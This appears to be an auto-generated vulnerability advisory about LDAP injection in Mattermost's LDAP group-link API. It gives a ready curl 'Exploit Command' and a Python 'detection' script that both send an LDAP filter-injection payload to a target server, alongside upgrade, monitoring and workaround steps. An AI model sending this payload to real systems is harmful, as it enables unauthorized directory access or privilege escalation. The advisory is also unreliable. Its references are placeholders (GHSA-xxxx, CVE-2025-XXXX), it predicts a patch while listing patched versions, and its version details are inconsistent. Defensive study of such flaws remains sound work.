Listen to this Post
Mattermost fails to properly validate LDAP group ID attributes in versions 10.7.x <= 10.7.1, 10.6.x <= 10.6.3, 10.5.x <= 10.5.4, and 9.11.x <= 9.11.13. An authenticated administrator with `PermissionSysconsoleWriteUserManagementGroups` can exploit this by injecting malicious LDAP search filters via the `PUT /api/v4/ldap/groups/{remote_id}/link` API. The vulnerability occurs when `objectGUID` is set as the Group ID Attribute, allowing unintended LDAP query manipulation. This could lead to unauthorized data access or privilege escalation.
DailyCVE Form:
Platform: Mattermost
Version: 10.7.0-10.7.1
Vulnerability: LDAP Injection
Severity: Moderate
Date: Jun 11, 2025
Prediction: Patch by Jun 25, 2025
What Undercode Say:
Analytics:
- Exploitable via crafted `objectGUID` in API requests.
- Requires admin privileges.
- Impacts LDAP-integrated environments.
Exploit Command:
curl -X PUT -H "Authorization: Bearer ADMIN_TOKEN" -d '{"remote_id":")(objectClass=))"}' https://target/api/v4/ldap/groups/1/link
Mitigation Steps:
- Upgrade to patched versions (10.7.2, 10.6.4, 10.5.5, or 9.11.14).
2. Restrict `PermissionSysconsoleWriteUserManagementGroups`.
3. Sanitize LDAP inputs server-side.
Detection Script:
import requests
def check_vulnerability(url, token):
headers = {"Authorization": f"Bearer {token}"}
payload = {"remote_id": ")(objectClass=))"}
response = requests.put(f"{url}/api/v4/ldap/groups/1/link", headers=headers, json=payload)
return "LDAP error" in response.text
Patch Verification:
grep -r "objectGUID" /opt/mattermost/config.json
Workaround:
Disable LDAP group sync if unused.
Log Monitoring:
tail -f /var/log/mattermost/access.log | grep "PUT /api/v4/ldap/groups"
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- NVD: CVE-2025-XXXX
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
